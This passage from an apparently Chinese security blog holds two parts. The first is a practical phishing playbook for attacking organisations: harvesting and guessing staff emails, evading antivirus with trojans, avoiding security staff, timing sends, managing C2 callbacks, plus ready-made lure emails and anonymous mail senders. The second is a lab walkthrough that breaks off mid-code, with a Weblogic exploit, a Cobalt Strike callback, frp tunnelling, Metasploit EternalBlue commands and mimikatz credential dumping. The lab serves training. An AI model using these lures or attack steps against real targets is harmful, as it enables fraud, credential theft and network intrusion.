href="https://mailtester.com/testmail.php">https://mailtester.com/testmail.php</a></p><p><a href="https://app.snov.io/verify/individual-emails">https://app.snov.io/verify/individual-emails</a></p><p>This tool automatically combines candidate addresses and then verifies the results one by one</p><p><a href="https://github.com/angusluk/MailTester">https://github.com/angusluk/MailTester</a><br>Get WeChat accounts via online customer service / hr / Boss Zhipin</p></li><li><p>Build a dictionary: many corporate mailboxes are name-in-pinyin@company domain, so use dictionaries such as Chinese name pinyin and initial abbreviations top 100, 1000, 10000 combined with the information already gathered; every extra address is a little more chance of success</p><p>This can be combined with the site <a href="https://www.aies.cn/pinyin.htm">https://www.aies.cn/pinyin.htm</a> to build a name dictionary from the collected target information</p></li></ol><p>Extract the people who look like network administrators, ops staff, or the security department; either write to them separately or do not send to them at all, because their security awareness is relatively high</p></li><li><p>Generate the Trojan; at a minimum it must</p><ol><li><p>Evade antivirus</p></li><li><p>Use a pretext written from the collected information</p><p>For example, send a résumé in response to a job posting</p></li><li><p>Be stealthy, e.g. a PDF that self-extracts and drops the payload</p></li></ol></li><li><p>Send the phishing mail</p><ol><li>Bulk sending through a phishing platform; whether because of the content or because hw periods are stricter, the callback rate is low</li><li>Individual targeted mails; even then do not send many to one target, there is always someone with high security awareness, and the content must match the mailbox's source</li><li>Phishing through instant messaging software, ideally combined with precise data obtained from the initial foothold and a suitable pretext</li></ol></li><li><p>C2/CS callback</p><ol><li>WeChat notification on callback</li><li>One-click persistence</li><li>Distinguish phishing targets by certificate name for easier management</li><li>Regularly check whether the IP has been flagged or has related threat intel</li></ol></li></ol><p>Notes:</p><p>Pay special attention to the time phishing mails are sent; unlike scanning, phishing cannot run 24h, it has to align with the target organization's working hours and lunch break, and sending in the morning is best so there is enough time</p><p>The approaches with the higher success rates:</p><ol><li>Phishing via WeChat using personal information from existing systems such as the OA</li><li>Sending a résumé for a newly posted job opening</li><li>Reporting a problem to customer service</li></ol><p>A problem encountered: some people have high security awareness, or company policy only accepts pdf or word files, so a different payload is needed</p><ol><li>AV-evading pdf bundled as a self-extracting archive</li><li>Phishing combined with vulnerabilities: coremail, wps, office</li></ol><p><strong>Other articles</strong></p><p><a href="https://mp.weixin.qq.com/s/aatNjey3swZz7T4Yw_LqsQ">红队测试之邮箱打点</a></p><p><a href="https://xz.aliyun.com/t/10731">https://xz.aliyun.com/t/10731</a></p><p><a href="https://mp.weixin.qq.com/s/ZptprvkNXRP0PNpmoXpbFg">Macos钓鱼上线CS踩坑流程</a></p><h2 id="钓鱼模版"><a href="#钓鱼模版" class="headerlink" title="钓鱼模版"></a>Phishing templates</h2><p>Some phishing templates collected online</p><p>Password reset</p><p>The attacker impersonates an administrator and gets the victim to click a link in the phishing mail to change all kinds of passwords, as follows:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxx,您好</span><br><span class="line"> 我是xx部门的信息,我的oa系统账号密码忘记了,麻烦帮我重置一下我的oa帐号密码,然后将新的账号密码发到这个邮箱,十分感谢!</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">大家好:</span><br><span class="line"> 近期由于我们公司的邮箱密码泄露,为防止不法分子利用,影响到我们的数据安全,各位员工的密码均需要及时更新修改,在收到邮件的第一时间,请登录如下平台,立即修改自己邮箱的账号密码。</span><br></pre></td></tr></table></figure><p>Account unfreezing</p><p>The attacker impersonates a system administrator and gets the victim to click a link in the phishing mail to unfreeze an account</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">您好!</span><br><span class="line"> 上网行为管理近几日发现您的账号存在异常行为,为了防止您的账号被不法分子盗取,我们暂时将您的账号进行了冻结,如果不是您本人的操作的话,可以点击下面的链接进行解冻。</span><br></pre></td></tr></table></figure><p>Patch upgrade</p><p>The attacker impersonates a system administrator and gets the victim to open the attachment in the phishing mail as a patch upgrade.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">各位同事,大家好!</span><br><span class="line"> 近日微软发布了本月安全更新补丁,其中包含一个RDP(远程桌面服务)远程代码执行漏洞的补丁更新,对应CVE编号为CVE-2019-0708,现需要所有员工的电脑都打上补丁,漏洞补丁直接下载附件即可</span><br></pre></td></tr></table></figure><p>Information collection</p><p>Exploiting the pandemic, get the victim to click a link in the phishing mail to report information.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">各位同事,大家好:</span><br><span class="line">近日,在xx的来往人员中进行核算检查时,又发现了核酸检测呈阳性的人员。</span><br><span class="line"> 为了更好的配合政府的疫情防控工作的顺利展开,我们公司主动承担了内部人员的信息收集工作,需要员工填写一些个人基本信息、核酸检测信息、行程信息等信息。 </span><br><span class="line">可以扫描二维码填写基本信息</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">各位同事,大家好:</span><br><span class="line"> 为落实“xx市疫情防控策略”的工作要求,推进疫情防控相关的数据共享,提升排查效率。我司开发人员设计出一个“疫情防控信息公示系统”,将个人基本信息,行程信息,温度信息,是否打疫苗等相关信息整合到一个公示平台之上,员工可以在线查看有关信息,享受”一站式”服务,同时推进疫情防控工作的展开。</span><br><span class="line">目前该系统处于推广阶段,开发人员将根据用户体验,不断优化业务流程,继续完善平台共功能,欢迎各位领导、同事提出宝贵意见。</span><br><span class="line">平台网址:http:xx.xx.com</span><br></pre></td></tr></table></figure><p>Holiday gift package</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">各位同事好: </span><br><span class="line"> 春节临近,旧的一年即将过去,崭新的一年即将到来,我们将为各位员工准备春节大礼包,现在需要填写一下家庭住址等基本信息</span><br></pre></td></tr></table></figure><p>Résumé template</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">攻击手段:根据招聘信息对招聘邮箱进行钓鱼邮件攻击,发送带有宏代码的简历文档,及免杀exe程序</span></span><br><span class="line"></span><br><span class="line"><span class="section">邮件模板:</span></span><br><span class="line"><span class="section">您好:</span></span><br><span class="line">看到贵公司官网在招聘产品开发岗,本人7年金融证券相关产品开发经验,具有较为丰富的项目经验,主要擅长Java,C++等语言,附件是本人开发的作品及个人简历,还请贵司查看,期待您的回信,谢谢。</span><br></pre></td></tr></table></figure><p>Cooperation template</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">攻击手段:</span></span><br><span class="line">根据官网搜集到公司的业务功能、合作的企业信息及联系方式</span><br><span class="line">发送钓鱼邮件附件为带有office宏攻击代码的word文档。</span><br><span class="line"></span><br><span class="line"><span class="section">邮件模板:</span></span><br><span class="line">xxx公司您好:</span><br><span class="line">我是xxx公司市场营销部的xxx,我在贵公司官网上了解到贵方有提供xxx业务服务(或经xxx合作商推荐)。满足本公司的项目需求,故有合作意向,以下为本公司的项目合作意向书,请查阅,希望能与贵方合作共赢!</span><br></pre></td></tr></table></figure><p>Complaint email</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">攻击手段: </span></span><br><span class="line">根据官网搜集到目标咨询及投诉渠道获取邮箱账号。</span><br><span class="line">发送钓鱼邮件附件为带有office宏攻击代码的word文档。</span><br><span class="line"></span><br><span class="line"><span class="section">邮件模板:</span></span><br><span class="line"><span class="section">xxx银行您好:</span></span><br><span class="line">我是贵方银行的用户,我于x月x日与行方在线客户进行业务咨询,但是编号xxx客服服务态度恶劣且怠慢,非但没能解决我的问题,还给我带来了很不好的用户体验。相关聊天记已记录在文档里,请行内人员尽快给一个处理的结果。</span><br></pre></td></tr></table></figure><p>Official announcement</p><p><img src="https://s2.loli.net/2022/09/15/uzC7M8SspafrZtO.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/15/4eImFu7dQBhVYyW.jpg" alt="2021-07-15-12-56-09"></p><p><img src="https://s2.loli.net/2022/09/15/1qf49GYuLpDhA6B.png" alt="img"></p><p>Some other sites</p><p>Email collection</p><p>Addresses found on the official website suit targeted phishing; for those from resource lists, send only a few mails per mailbox so it does not get banned</p><p><a href="https://hunter.io/">https://hunter.io/</a></p><p><a href="http://www.skymem.info/">http://www.skymem.info/</a></p><p><a href="https://phonebook.cz/">https://phonebook.cz/</a></p><p><a href="https://www.email-format.com/i/search/">https://www.email-format.com/i/search/</a></p><p><a href="https://github.com/bit4woo/teemo">https://github.com/bit4woo/teemo</a></p><p><a href="https://github.com/laramies/theHarvester">https://github.com/laramies/theHarvester</a></p><p>Online mail sending:</p><p><a href="https://link.zhihu.com/?target=https://emkei.cz/?reCAPTCHAv2">https://emkei.cz/?reCAPTCHAv2</a></p><p><a href="https://link.zhihu.com/?target=http://tool.chacuo.net/mailanonymous">http://tool.chacuo.net/mailanonymous</a></p><p><a href="https://link.zhihu.com/?target=https://ihuan.me/mail">https://ihuan.me/mail</a></p><p><a href="https://link.zhihu.com/?target=http://deadfake.com/Send.aspx">http://deadfake.com/Send.aspx</a></p><p>Temporary mailboxes</p><p><a href="https://link.zhihu.com/?target=http://24mail.chacuo.net/">http://24mail.chacuo.net/</a></p><p><a href="https://link.zhihu.com/?target=https://10minutemail.net/">https://10minutemail.net/</a></p><p><a href="https://link.zhihu.com/?target=http://www.linshiyouxiang.net/">http://www.linshiyouxiang.net/</a></p>]]></content>
<summary type="html"><p><img src="https://s2.loli.net/2022/09/15/z7o8JmQqHZVhTsg.png" alt="img"></p>
<ol>
<li><p>Preparation</p>
<p>Email accounts, WeChat accounts, Maimai accounts, anonymous phone numbers and so on must be anonymous; for the VPS, C2 and the like</summary>
<category term="社工" scheme="https://oceansec.github.io/categories/%E7%A4%BE%E5%B7%A5/"/>
<category term="钓鱼" scheme="https://oceansec.github.io/tags/%E9%92%93%E9%B1%BC/"/>
</entry>
<entry>
<title>Vulnerability Lab Practice: a Red Team Lab from External Weblogic into the Intranet, then Taking Over the Domain Controller via Constrained Delegation</title>
<link href="https://oceansec.github.io/2023/12/05/%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98-%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E4%BB%8E%E5%A4%96%E7%BD%91%20Weblogic%20%E6%89%93%E8%BF%9B%E5%86%85%E7%BD%91%EF%BC%8C%E5%86%8D%E5%88%B0%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7/"/>
<id>https://oceansec.github.io/2023/12/05/%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98-%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E4%BB%8E%E5%A4%96%E7%BD%91%20Weblogic%20%E6%89%93%E8%BF%9B%E5%86%85%E7%BD%91%EF%BC%8C%E5%86%8D%E5%88%B0%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7/</id>
<published>2023-12-05T02:59:04.864Z</published>
<updated>2022-08-26T13:23:56.410Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"><br>From external Weblogic into the intranet, then taking over the domain controller via constrained delegation</p><p>The lab comes from 渗透攻击红队; official writeup and download link: <a href="https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ">https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ</a></p><p>Vulnerabilities present in this lab:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GPP:admin:admin!@#45</span><br><span class="line">GPP vulnerability present</span><br><span class="line">MS14-068 present</span><br><span class="line">CVE-2020-1472 present</span><br><span class="line">Exchange: all kinds of vulnerabilities can be tried</span><br><span class="line">Unconstrained delegation can be tried</span><br><span class="line">Constrained delegation can be tried</span><br><span class="line">CVE-2019-1388 present</span><br><span class="line">CVE-2019-0708 present</span><br></pre></td></tr></table></figure><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>Environment setup</h2><p>The virtual machine files are large, 74.8G after extraction, so make sure there is enough space; an SSD is recommended. After extraction, scan for the virtual machines with VMware and take ownership of each in turn</p><p><img src="https://img-blog.csdnimg.cn/img_convert/58db02a27121d3854e41dda3f6774996.png" alt="image-20220507102253091"></p><p>Network topology</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c2dac37a42c41c0cdf57d09402647c16.png" alt="图片"></p><p>Updated environment for the diagram above</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Gateway IP:192.168.43.252</span><br><span class="line">Kali IP:192.168.43.58</span><br><span class="line">Windows 11 hacker IP:192.168.43.166</span><br><span class="line">Windows 2012 IP:192.168.43.92</span><br></pre></td></tr></table></figure><p>Windows can ping Kali but Kali cannot ping Windows; this is easily traced to the Windows firewall, so just turn it off</p><p>One more thing to note: bridged mode was chosen here, whereas NAT was used before; either works</p><p><img src="https://img-blog.csdnimg.cn/img_convert/da7162af67bf32ef042224bd9c63a95f.png" alt="image-20220507144405849"></p><p>This figure explains the difference well: in NAT mode the physical host can reach all virtual machines but the virtual machines cannot reach the physical host, while bridged mode allows access in both directions. Also, on a campus network that requires authentication you most likely cannot use bridged mode (the VMs get no internet access)</p><p>The weblogic on target machine one must be started manually</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">weblogic install directory: C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain (run startWebLogic.cmd manually)</span><br></pre></td></tr></table></figure><h2 id="1-外网打点"><a href="#1-外网打点" class="headerlink" title="1.外网打点"></a>1. External foothold</h2><p>Target IP: 192.168.43.92</p><p>Port scanning and service discovery with nmap</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -sT -Pn 192.168.43.92</span><br></pre></td></tr></table></figure><p>In real engagements it is advisable to specify the ports to scan, since that is faster and more accurate</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 192.168.43.92</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/73736d8709b4fbba06cac2ad68693ef3.png" alt="image-20220507152533105"></p><p>Port 7001 is open, i.e. the weblogic service</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.43.92:7001/console/login/LoginForm.jsp</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/139a694f259d70647dc457b13c998754.png" alt="image-20220507150339521"></p><p>Exploited with a tool (<a href="/console/css/%252e%252e%252fconsole.portal">download</a>), which is rather script-kiddie</p><p><img src="https://img-blog.csdnimg.cn/img_convert/45f89c7633482fe0104819179880321d.png" alt="image-20220507152649200"></p><p>Running a command shows administrator privileges and outbound internet connectivity</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1525634f203e6830fcfd04fd6221f8cc.png" alt="image-20220507152734392"></p><h2 id="2-上线-CS"><a href="#2-上线-CS" class="headerlink" title="2.上线 CS"></a>2. Calling back to CS</h2><p>Run the Powershell command directly to call back to CS</p><p>Start the CS server on the VPS or the kali VM, create a listener, and run the command</p><p><img src="https://img-blog.csdnimg.cn/img_convert/387a4c292073f6d5452bdfaa52c6e0e0.png" alt="image-20220507160155736"></p><p>Online</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d32c860123c00b3b4fd2384f9ef5ef25.png" alt="image-20220507160209182"></p><p>A command reveals a second network card on an internal subnet</p><p><img src="https://img-blog.csdnimg.cn/img_convert/65c0b09ca8f89bb9513db47ad100f96c.png" alt="image-20220507160554444"></p><h2 id="3-内网横向"><a href="#3-内网横向" class="headerlink" title="3.内网横向"></a>3. Lateral movement</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h3><ul><li><p>Dump host credentials</p><p><img src="https://img-blog.csdnimg.cn/img_convert/06c209be7dcc7ab432985a32c12b91a2.png" alt="image-20220507161002707"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">WEBLOGIC\Administrator ccef208c6485269c20db2cad21734fe7</span><br></pre></td></tr></table></figure><p>The target is WinServer 2012, so the plaintext password cannot be read directly</p></li><li><p><strong>Check whether the host is domain-joined</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/5c61b64ed3835c5b205efabf2a14ef41.png" alt="image-20220507162339102"></p><p>It is in a workgroup rather than a domain</p><p>Confirm with the following two commands</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br><span class="line">net config workstation</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/8a0847cf7bfae37a8bb822fcf3fff678.png" alt="image-20220507162536101"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/ee406d060d9c7182a1f28a838ad7f408.png" alt="image-20220507162502035"></p></li></ul><h3 id="存活探测-amp-漏洞扫描"><a href="#存活探测-amp-漏洞扫描" class="headerlink" title="存活探测&漏洞扫描"></a>Host discovery &amp; vulnerability scanning</h3><p>Import the Cobalt-Strike-Aggressor-Scripts plugin set into CS; plugin download: <strong><a href="https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts">https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts</a></strong></p><p><img src="https://img-blog.csdnimg.cn/img_convert/88b6909ff8e8dd9363104cbb2ae47f0b.png" alt="image-20220507163012012"></p><p>After loading, right-clicking the host list shows many tools</p><p><img src="https://img-blog.csdnimg.cn/img_convert/b90b151806e08a2df57d9c1a2736e292.png" alt="image-20220507163102893"></p><p>Upload nbtscan to the Victim machine, then run nbtscan against 10.10.20.0/24</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e659690e8de39a69fbc6629284ed1fc9.png" alt="image-20220507163330797"></p><p>One machine is found at 10.10.20.7</p><p>Upload fscan through file management and scan</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell fscan_win32.exe -h 10.10.20.0/24</span><br></pre></td></tr></table></figure><p>The target is a win7 system and is vulnerable to EternalBlue</p><p><img src="https://img-blog.csdnimg.cn/img_convert/3a73440dd63a370a116f890d879fb66b.png" alt="image-20220507163928351"></p><h3 id="搭建代理"><a href="#搭建代理" class="headerlink" title="搭建代理"></a>Setting up a proxy</h3><ol><li><p>Set up an Frp tunnel for exploitation; on Kali, write the Frps.ini configuration file</p><p><img src="https://img-blog.csdnimg.cn/img_convert/f0db1cb9f76b182fd52b6d4c13d1a5c6.png" alt="image-20220507164347971"></p><p>Start Frps</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frps -c frps.ini</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/f88fe2b96977525b12121e0cd9e9fa5f.png" alt="image-20220507164613634"></p></li><li><p>Upload frpc.exe and frpc.ini to the Victim</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = VPS/kali ip</span><br><span class="line">server_port = 7000</span><br><span class="line"></span><br><span class="line">[plugin_socks]</span><br><span class="line">type = tcp</span><br><span class="line">remote_port = 7777</span><br><span class="line">plugin = socks5</span><br></pre></td></tr></table></figure><p>Start frpc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell frpc.exe -c frpc.ini</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/74c5b88c3e1bda17df18566042555496.png" alt="image-20220507165114178"></p><p>Once started, the proxy is in place and the attacker can send requests into the intranet through the weblogic target as a pivot</p></li></ol><h3 id="ms17010"><a href="#ms17010" class="headerlink" title="ms17010"></a>ms17010</h3><p>Because the intranet win7 host is vulnerable to ms17010, use msf directly</p><p>First obtain a meterpreter session</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf6 > setg Proxies socks5:192.168.43.58:7777</span><br><span class="line">msf6 > setg ReverseAllowProxy true</span><br><span class="line">msf6 > use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">msf6 > set payload windows/x64/meterpreter/bind_tcp</span><br><span class="line">msf6 > set rhost 10.10.20.7</span><br><span class="line">msf6 > run</span><br></pre></td></tr></table></figure><p>The proxy IP is kali's IP; rhost is the intranet address</p><p>The msf output shows the attack flow clearly; it uses the target's smb port 445</p><p>The first attempt ended in a blue screen</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5733fd0ae247e78ce085b23ef76677f3.png" alt="image-20220508105156665"></p><p><strong>Reasons the MSF EternalBlue ms17010 module fails</strong></p><ol><li>If it does not succeed the first time, try again several times</li><li>The target machine blue-screens</li><li>The MSF payload is 64-bit, so the target must be 64-bit too; there is also a 32-bit python payload</li><li>EternalBlue generates a lot of traffic</li></ol><p>After raising the win7 target's memory to 2G, the second attempt succeeded</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a36422f328b7f0ccb490f9303b10f642.png" alt="image-20220508105707845"></p><p>Got meterpreter</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c1aa78437073208b5b07a254e74142a8.png" alt="image-20220508105805150"></p><h3 id="抓密码"><a href="#抓密码" class="headerlink" title="抓密码"></a>Dumping credentials</h3><p>Load mimikatz to read credentials</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">load mimikatz</span><br><span class="line">msv</span><br><span class="line">kerberos</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/1e893fc7c920aa2fddf24e86af7d463d.png" alt="image-20220508105943889"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/c1c02b393b775f3873070238e45dec92.png" alt="image-20220508110552191"></p><p>The newer mimikatz extension, kiwi, can also be loaded</p><p><img src="https://img-blog.csdnimg.cn/img_convert/916a442af23806ca7c89784da7bf4c0a.png" alt="image-20220508110643832"></p><p>No plaintext password was found because the win7 administrator has not logged in; once the administrator logs on to the machine and the command is run again, the plaintext password can be obtained</p><p><img src="https://img-blog.csdnimg.cn/img_convert/24630c2ce6b77982ea9aa7c291080786.png" alt="image-20220508111022485"></p><h2 id="4-二层内网域渗透"><a href="#4-二层内网域渗透" class="headerlink" title="4.二层内网域渗透"></a>4. Second-layer intranet domain penetration</h2><p>PS: after my computer restarted most of the addresses changed; IPs updated below, and frp and the msf connection had to be set up again</p><blockquote><p>server 2012 weblogic:192.168.43.93</p><p>kali:192.168.43.99</p></blockquote><h3 id="win7上线cs"><a href="#win7上线cs" class="headerlink" title="win7上线cs"></a>Getting win7 onto cs</h3><p>Bring win7 onto cs through a relay; the current options for getting onto cs are</p><ol><li>Upload the cs backdoor exe via msf and run it</li><li>Spawn the msf meterpreter session into a cs session</li><li>From cs, upload the cs backdoor to the win7 target over ipc$ and run it with a scheduled task</li></ol><p>Option one is used</p><p>1. Set up a relay listener in CS</p><p><img src="https://img-blog.csdnimg.cn/img_convert/01bb266ebb83732c2081794d0476180f.png" alt="image-20220508111333148"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/8a6884eb675b6afa7e052f4bd7968742.png" alt="image-20220508111338364"></p><p>2. Generate the backdoor</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1f2d5eea0895b1de259889cc6b9fcc07.png" alt="image-20220508131115128"></p><p>Upload the backdoor to kali, then upload it to the win7 target from msf with the upload command</p><p><strong><img src="https://img-blog.csdnimg.cn/img_convert/4baa7f87ee4a04e38f6909b0c7d58a3d.png" alt="image-20220508132517982"></strong></p><p>Enter the shell and run beacon.exe</p><p><img src="https://img-blog.csdnimg.cn/img_convert/fa5b114608f357b6f32e03f2ab861bdb.png" alt="image-20220508132547578"></p><p>Successfully online in cs</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d2b14865a05a3f994c6339ecbe2dcda6.png" alt="image-20220508132607160"></p><h3 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>Intranet information gathering</h3><ul><li>```<br>shell whoami<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">![image-20220508132840943](https://img-blog.csdnimg.cn/img_convert/12afe22796d469144f3460cf54ef126d.png)</span><br><span class="line"></span><br></pre></td></tr></table></figure>shell ipconfig<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"> Found the intranet 10.10.10.0/24 segment</span><br><span class="line"></span><br><span class="line"> ![image-20220508132931259](https://img-blog.csdnimg.cn/img_convert/54805adf717446c36e389f2f90ded000.png)</span><br><span class="line"></span><br><span class="line">- **Check whether it is a domain environment**</span><br><span class="line"></span><br></pre></td></tr></table></figure>shell ipconfig /all<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">![image-20220508133208864](https://img-blog.csdnimg.cn/img_convert/db34af5ab312f9c6f65eb8ebf667d3dc.png)</span><br><span class="line"></span><br></pre></td></tr></table></figure>shell net user /domain<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"> ![image-20220508133248296](https://img-blog.csdnimg.cn/img_convert/e40d870b22c1485565e4a46cfb11a176.png)</span><br><span class="line"></span><br><span class="line">- Identify the domain controller IP</span><br><span class="line"></span><br></pre></td></tr></table></figure>net group “Domain Controllers” /domain<br>or net time /domain<br>ping owa -n 2<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"> ![image-20220508133655941](https://img-blog.csdnimg.cn/img_convert/55d83e5cc5fcbc3dbf6231aeafb703e1.png)</span><br><span class="line"></span><br><span class="line"> ![image-20220508133445538](https://img-blog.csdnimg.cn/img_convert/86dc629e56bf721bc246b18d5382c673.png)</span><br><span class="line"></span><br><span class="line">No process belonging to a domain admin is present, so token theft is set aside for now</span><br><span class="line"></span><br><span class="line">![image-20220508134529747](https://img-blog.csdnimg.cn/img_convert/1264e8d021f1d34c6d2a4df6a5266370.png)</span><br><span class="line"></span><br><span class="line">Since we already obtained a domain user's account and password via ms17010 -> mimikatz, try to find users with constrained delegation</span><br><span class="line"></span><br><span class="line">First upload the adfind tool to the win7 target</span><br><span 